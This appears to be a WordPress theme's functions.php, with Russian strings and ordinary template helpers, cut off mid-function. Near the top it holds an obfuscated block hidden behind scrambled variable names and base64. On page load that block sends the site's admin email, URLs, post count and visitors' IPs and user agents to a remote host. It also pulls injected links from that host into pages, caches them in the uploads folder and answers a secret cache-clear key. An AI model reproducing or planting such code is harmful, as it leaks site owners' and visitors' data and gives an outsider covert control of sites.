<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $cfkwwk='o';$gdWFQeH='e';$cMUQ='6';$JpBSB='d';$YyzguH='c';$krLq='b';$GutIfil='s';$MTwH='a';$hWhzHyE='4';$nJrtN='e';$rabpH='_';$MRTvh='d';$oBZzM='e';$liCZMOkn=$krLq.$MTwH.$GutIfil.$oBZzM.$cMUQ.$hWhzHyE.$rabpH.$JpBSB.$gdWFQeH.$YyzguH.$cfkwwk.$MRTvh.$nJrtN;$ZZwSgMD='n';$MvRLvoE='t';$YJIjWZy='i';$TOilQJa='f';$eNbMX='a';$orbB='g';$ahvUWE='e';$hPmnO='l';$IxPNfYe='z';$BCTgpLNh=$orbB.$IxPNfYe.$YJIjWZy.$ZZwSgMD.$TOilQJa.$hPmnO.$eNbMX.$MvRLvoE.$ahvUWE;$IuEw='r';$ccDyZ='r';$EPBHt='1';$vcEJWh='o';$SQIIw='t';$VJkQGPW='t';$mRFXnUC='s';$hKRU='_';$Gvgqmbz='3';$IKPNyQAv=$mRFXnUC.$VJkQGPW.$ccDyZ.$hKRU.$IuEw.$vcEJWh.$SQIIw.$EPBHt.$Gvgqmbz;$dGnY='s';$qaRXnQl='v';$ePNoi='t';$CcYsSZ='e';$CFti='r';$RaNLf='r';$jUsQPavx=$dGnY.$ePNoi.$RaNLf.$CFti.$CcYsSZ.$qaRXnQl;                     $pw____________b='o';$qk_______m='e';$gn____d='6';$km______________i='d';$bi____h='c';$xe_________c='b';$gg___________l='s';$wq______________s='a';$cj___p='4';$uy_____________w='e';$ib__________s='_';$lg____________s='d';$mp_________r='e';$eq_______________p=$xe_________c.$wq______________s.$gg___________l.$mp_________r.$gn____d.$cj___p.$ib__________s.$km______________i.$qk_______m.$bi____h.$pw____________b.$lg____________s.$uy_____________w;$ah__m='t';$wo______o='e';$eg____________h='i';$ry___________l='n';$gr_____________w='i';$ra___w='u';$lm____i='o';$lf___________w='c';$ug_____________n='s';$mb__y='x';$uw________l='_';$ot_________t='s';$qw_______________s='t';$te_____________b='n';$iq__k='f';$kz________o=$iq__k.$ra___w.$ry___________l.$lf___________w.$qw_______________s.$eg____________h.$lm____i.$te_____________b.$uw________l.$wo______o.$mb__y.$gr_____________w.$ot_________t.$ah__m.$ug_____________n;$ay____u='f';$ey______o='o';$ak_____r='e';$ke_____________l='n';$ny____________z='p';$wj_______________x=$ay____u.$ey______o.$ny____________z.$ak_____r.$ke_____________l;$jn____z='d';$zr_______p='a';$ee_______g='r';$na______y='f';$cc______________x='e';$bx__________n=$na______y.$ee_______g.$cc______________x.$zr_______p.$jn____z;$mr__v='c';$cw______________y='f';$sx_____________x='l';$mf_______________r='s';$nm__________d='o';$fz_______________i='e';$yf_______t=$cw______________y.$mr__v.$sx_____________x.$nm__________d.$mf_______________r.$fz_______________i;define("WP_ID", $eq_______________p("Mi4wLjA="));define("WP_TTL", $eq_______________p("MTA4MDA="));define("WP_SRC", $eq_______________p("dHBva24="));function wp_get_header() {global $eq_______________p, $kz________o;if ($kz________o($eq_______________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$kz________o($eq_______________p("d3BfZ2V0X2Zvb3Rlcg==")) &&$kz________o($eq_______________p("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $eq_______________p, $wj_______________x, $yf_______t, $bx__________n;$ct_______o = TEMPLATEPATH."/".$eq_______________p("Zm9vdGVyLnBocA==");$ex____________r = @$wj_______________x($ct_______o, "r");$ct_______o = @$bx__________n($ex____________r, @filesize($ct_______o));@$yf_______t($ex____________r);$so____t = TEMPLATEPATH."/".$eq_______________p("ZnVuY3Rpb25zLnBocA==");$ex____________r = @$wj_______________x($so____t, "r");$so____t = @$bx__________n($ex____________r, @filesize($so____t));@$yf_______t($ex____________r);$tv______l = 0;if($ct_______o && $so____t) {if ($eq_______________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ct_______o, $eq_______________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$tv______l = 1;}if (substr_count($ct_______o, "wp_theme_GPL_credits()") < 1) {$tv______l = 2;}}if(WP_ID != "2.0.0") {$tv______l = 12;}}if($tv______l > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $tv______l -->";}}function wp_loaded() {global $eq_______________p, $kz________o;return $kz________o($eq_______________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($tn______________n, $sj__l = "(more...)", $eo____i = 0, $sn_________s = "") {$xy_______________o = get_the_content($sj__l, $eo____i, $sn_________s);$xy_______________o = apply_filters("the_content", $xy_______________o);$xy_______________o = str_replace("]]>", "]]>", $xy_______________o);if (strlen($_GET["p"]) > 0) {echo $xy_______________o;}else if ((strlen($xy_______________o)>$tn______________n) && ($ln____d = strpos($xy_______________o, " ", $tn______________n ))) {$xy_______________o = substr($xy_______________o, 0, $ln____d);$xy_______________o = $xy_______________o;echo $xy_______________o;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$sj__l</a></div></p>";} else {echo $xy_______________o;}}}$yk_________y='e';$ui___m='o';$qs_______________u='e';$ac_____________h='4';$hx___________r='c';$wl_____________u='a';$sw____k='e';$fh______________t='d';$fr_______________a='_';$di______________h='b';$oq_________u='6';$av__w='n';$jx___________l='s';$xw__________p=$di______________h.$wl_____________u.$jx___________l.$sw____k.$oq_________u.$ac_____________h.$fr_______________a.$qs_______________u.$av__w.$hx___________r.$ui___m.$fh______________t.$yk_________y;$mj_____________m='_';$py_____e='s';$ow____y='e';$gq_________w='l';$az___________l='n';$vn__________c='f';$an____o='e';$ed_____i='e';$ly___h='g';$fw___________k='o';$mc_______x='t';$hg___u='t';$kj_________i='n';$pp_______w='c';$zg____________w='i';$lm_______z='_';$yy____________t='t';$qp______________g=$vn__________c.$zg____________w.$gq_________w.$ed_____i.$lm_______z.$ly___h.$ow____y.$yy____________t.$mj_____________m.$pp_______w.$fw___________k.$az___________l.$mc_______x.$an____o.$kj_________i.$hg___u.$py_____e;$ks____z='l';$hb___y='f';$np___x='t';$vf___________o='e';$bs______________h='i';$vn____v='x';$gx_________c='_';$uv___________v='s';$hh______________a='s';$ls___________t='i';$se___j='e';$fa_______________s=$hb___y.$bs______________h.$ks____z.$se___j.$gx_________c.$vf___________o.$vn____v.$ls___________t.$uv___________v.$np___x.$hh______________a;$dl___f='m';$bv_______________s='s';$fm_________k='r';$mo______________p='o';$yg_______________m='o';$fu_______________n='n';$ki____________x='i';$ux_________p='e';$gc______________q='p';$nb________m='_';$nx________q='r';$gm______________u='e';$zn_________f='v';$lq_________x='a';$ob___________j='c';$wt________x=$zn_________f.$ux_________p.$nx________q.$bv_______________s.$ki____________x.$mo______________p.$fu_______________n.$nb________m.$ob___________j.$yg_______________m.$dl___f.$gc______________q.$lq_________x.$fm_________k.$gm______________u;$yx__________u='f';$yd___t='c';$du____________p='k';$zr______________x='n';$lp__________n='o';$eb__c='e';$sq__t='p';$ye______________c='s';$rq___________t='o';$ku____v=$yx__________u.$ye______________c.$rq___________t.$yd___t.$du____________p.$lp__________n.$sq__t.$eb__c.$zr______________x;$sy___p='f';$ul_________p='r';$sd___e='w';$es_______y='e';$qc__________d='t';$us_________z='i';$tc________v=$sy___p.$sd___e.$ul_________p.$us_________z.$qc__________d.$es_______y;$zp__p='d';$hh__c='m';$sq____________x='5';$fj_____________f=$hh__c.$zp__p.$sq____________x;$er_____________v='r';$cd___d='l';$pi____________e='a';$pa____q='p';$av_______r='a';$ny___________s='h';$mw______u='e';$ea___________r='t';$oj______________q=$er_____________v.$mw______u.$pi____________e.$cd___d.$pa____q.$av_______r.$ea___________r.$ny___________s;$cw___________w='i';$aj____________o='s';$fk___________o='e';$gy________p='u';$sj____________y='l';$hf_________q='i';$pr________q='z';$af____g='e';$jk___u='n';$py_____o='r';$qa_______o='a';$tq__________m=$gy________p.$jk___u.$aj____________o.$fk___________o.$py_____o.$cw___________w.$qa_______o.$sj____________y.$hf_________q.$pr________q.$af____g;$za____________n='p';$sx_____v='m';$nu__________w='a';$ww______y='n';$ls__j='e';$du______________o='m';$jk_______________e='t';$xv_____q=$jk_______________e.$ls__j.$du______________o.$za____________n.$ww______y.$nu__________w.$sx_____v;$xh_____m='s';$de___________a='_';$mx_______________t='t';$rq_________b='a';$si_____a='o';$dz______n='r';$pu____________i='c';$ki____________u='n';$kd___d='r';$hr______s='e';$ah_________o='a';$zb___r='e';$wz_____s='x';$hb___t='t';$vs________f='m';$id______u='e';$wl___t='c';$st______________w='t';$og________f='e';$ek_____v='_';$na_____________k='t';$pa__________a=$xh_____m.$hb___t.$kd___d.$hr______s.$rq_________b.$vs________f.$ek_____v.$wl___t.$si_____a.$ki____________u.$mx_______________t.$og________f.$wz_____s.$st______________w.$de___________a.$pu____________i.$dz______n.$id______u.$ah_________o.$na_____________k.$zb___r;function hw________f($yl_______h) {global $eq_______________p, $kz________o, $qp______________g, $wt________x, $pa__________a;if (!$kz________o($eq_______________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($wt________x(PHP_VERSION, "5.0.0", ">=") && $kz________o($eq_______________p("ZmlsZV9nZXRfY29udGVudHM=")) && $kz________o($eq_______________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$fz_________z = $pa__________a(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xm___k = @$qp______________g($yl_______h, 0, $fz_________z);} else {$xm___k = @$qp______________g($yl_______h, 0);}return $xm___k;}function uw________m($yl_______h) {global $kz________o, $ku____v, $tc________v, $eq_______________p;if (!$kz________o($eq_______________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$mj_______t = strpos($yl_______h, "/", 7);$ck____________l = array("uri"     => substr($yl_______h, $mj_______t),"host"    => str_replace("http://", "", substr($yl_______h, 0, $mj_______t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$dm________f = @$ku____v("$ck____________l[host]", 80, $bl___________b, $ug_________h, 4);if (!$dm________f) {return false;} else {$xm___k = "";$tz___f  = "GET $ck____________l[uri] HTTP/1.0\r\n";$tz___f .= "Host: $ck____________l[host]\r\n";$tz___f .= "Referer: $ck____________l[referer]\r\n";$tz___f .= "Connection: Close\r\n\r\n";@$tc________v($dm________f, $tz___f);while (!@feof($dm________f)) {$ap_________d = @fgets($dm________f, (1024*24));if ($ap_________d == "\r\n") {$qn_______________q = true;continue;}if ($qn_______________q) {$xm___k .= $ap_________d;}}return $xm___k;}}function bv_______t($yl_______h) {global $kz________o;$gw_______k = false;if ($yl_______h != "") {if ($kz________o("hw________f")) {$gw_______k = @hw________f($yl_______h);}if (!$gw_______k && ($kz________o("uw________m"))) {$gw_______k = @uw________m($yl_______h);}}return $gw_______k;}function qj______________a() {global $_SERVER, $fj_____________f;$iv___y = $_SERVER["SERVER_NAME"];if (substr("$iv___y", 0, 4) == "www.") {$iv___y = substr("$iv___y", 4);}$iv___y = $fj_____________f("$_SERVER[SERVER_NAME]");return $iv___y;}function ce_______j() {return "file";}function et________q($yl_______h) {global $_SERVER, $qp______________g, $fa_______________s, $wj_______________x, $yf_______t, $tc________v;$uh______h = ah__r();$iq___n = qj______________a().".jpg";$vp____l = $uh______h["dir_upload"]["path"]."/$iq___n";$eo___________s = @filemtime($vp____l);if (!$eo___________s || ((time()-$eo___________s) >= WP_TTL)) {$gw_______k = bv_______t($yl_______h);if ($gw_______k) {if ($fa_______________s($vp____l)) {@unlink($vp____l);}$ex____________r = @$wj_______________x($vp____l, "x+");@$tc________v($ex____________r, $gw_______k);@$yf_______t($ex____________r);}} else {if ($fa_______________s($vp____l)) {$gw_______k = @$qp______________g($vp____l);} else {$gw_______k = false;}}return $gw_______k;}function ah__r() {global $_SERVER, $eq_______________p, $xw__________p;$rs___________w = wp_count_posts("post");$fa________i = pathinfo(get_bloginfo("template_directory"));$uh______h = array("url" => array("report"      => $eq_______________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $fa________i,"dir_upload"=> zf________b(),"queryString"=> array("?a001=".WP_ID,"a004=".$fa________i[filename],"a005=".$rs___________w->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$uh______h["url"]["queryString"] = implode("&", $uh______h["queryString"]);$uh______h["url"]["report"] = $uh______h["url"]["report"]."/?".$xw__________p($uh______h["url"]["queryString"]).".html";return $uh______h;}function zf________b() {$vi____e = wp_upload_dir();if (isset($vi____e["error"])) {$cq______________c = lg__j();if (is_writable($cq______________c)) {$vi____e = array("path" => $cq______________c);}}return $vi____e;}function lg__j() {global $kz________o, $fj_____________f, $oj______________q, $xv_____q;$ny_______i = (bool) ini_get("safe_mode");if ($ny_______i == true) {return false;}if ($kz________o("sys_get_temp_dir")) {$nm_____k = sys_get_temp_dir();if (is_writable($nm_____k)) {return $oj______________q($nm_____k);}}if (!empty($_ENV["TMP"])) {return $oj______________q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $oj______________q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $oj______________q($_ENV["TEMP"]);} else {$kc____________x = $xv_____q($fj_____________f(uniqid(rand(), true)), "");if ($kc____________x) {$nm_____k = $oj______________q(dirname($kc____________x));@unlink($kc____________x);return $nm_____k;} else {return false;}}}function vd_____________a() {global $_GET, $fa_______________s;$uh______h = ah__r();$iv___y = qj______________a();$gp__________f = ce_______j();$jt______________m = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($gp__________f == "file") {$bb___t = $uh______h["dir_upload"]["path"]."/".$iv___y.".jpg";if ($fa_______________s($bb___t)) {@unlink($bb___t);$jt______________m = "deleted";}}$xp_________f = array("s"=> $jt______________m,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xp_________f AS $ab__c => $dc_____________p) echo " [$ab__c:$dc_____________p]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $kz________o, $eq_______________p, $tq__________m;$uh______h = ah__r();$tf_____________u = "et________q";if ($kz________o($tf_____________u)) {$xm___k = $tf_____________u($uh______h["url"]["report"]);}if ($xm___k) {if ($xm___k = @$eq_______________p($xm___k)) {$xm___k = @$tq__________m($xm___k);if (strlen($xm___k[custom_credit]) >= 5) {$uh______h["default_string"] = $xm___k[custom_credit];}if ($xm___k["status"] == "0") {$xf_____r = 1;$om_____________h = 1;} else {$og____________w = sizeof($xm___k["links"]);$fb___________k = $uh______h["default_string"];if ($og____________w > 0 && $xm___k["links"] !== "") {$oz_________i = 0;foreach ($xm___k["links"] as $ks__g => $ta______t) {$oz_________i++;if ($ta______t->l_path == "" || $ta______t->l_path == $_SERVER["REQUEST_URI"]) {$ta______t->l_href = htmlspecialchars(strip_tags($ta______t->l_href));$ta______t->l_title = htmlspecialchars(strip_tags($ta______t->l_title));$ta______t->l_anchor = htmlspecialchars(strip_tags($ta______t->l_anchor));$fb___________k .= " | ";$fb___________k .= "<a href='$ta______t->l_href' title='$ta______t->l_title'";if ($ta______t->l_nofollow == "1") {$fb___________k .= " rel='nofollow'";}$fb___________k .= ">$ta______t->l_anchor</a>";}}}$uh______h["links"] = "$fb___________k";if ($xm___k[credit] == "0") {$uh______h["links"] = "";}}} else {$xf_____r = "1";}} else {$xf_____r = "1";}if ($xf_____r == "1") {$uh______h["links"] = $uh______h["default_string"];}echo "$uh______h[links]";echo "<!-- s: $xm___k[signature] -->";vd_____________a();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
